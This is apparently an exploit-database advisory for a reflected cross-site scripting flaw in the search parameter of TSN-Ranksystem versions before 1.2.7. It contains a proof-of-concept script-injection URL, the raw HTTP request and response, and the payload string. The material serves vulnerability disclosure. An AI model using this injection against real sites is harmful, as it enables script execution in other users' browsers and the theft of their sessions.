# Exploit Title: TSN-Ranksystem < 1.2.7 - Cross-site scripting (XSS)
# Exploit Author: kodak
# Date: 2018-09-10
# Vendor Homepage: https://ts-n.net/ranksystem.php
# Software Link: https://github.com/Newcomer1989/TSN-Ranksystem/releases
# Category : webapps
# Tested on: Kali Linux / Windows 7
# CVE: N/A
1. Description:
--------------------
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications.
XSS enables attackers to inject client-side scripts into web pages viewed by other users.
What is the Ranksystem?
A TS3 bot, which automatically grant ranks (servergroups) to user on a TeamSpeak 3 Server for online time or online activity.
It also gathers informations and statistics about the user and displays the result on this site.
2. Exploit/POC:
--------------------
# Request:
http://127.0.0.1/stats/list_rankup.php?search="><script>alert("K0DAK:]")</script>
GET /stats/list_rankup.php?search=%22%3E%3Cscript%3Ealert(%22K0DAK:]%22)%3C/script%3E HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: fb620561f408b25819e9b3c4fad75f85=/; PHPSESSID=c4hp05dajten91kilaokaoi049
Connection: keep-alive
Upgrade-Insecure-Requests: 1
# Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Pragma: no-cache
Cache-Control: max-age=3
Content-Encoding: gzip
Parameter: Search Reflected (GET)
Location : /stats/list_rankup.php
Payload: search="><script>alert("K0DAK:]")</script>
3. Screenshot
--------------------
https://imgur.com/a/Ki0VV8c
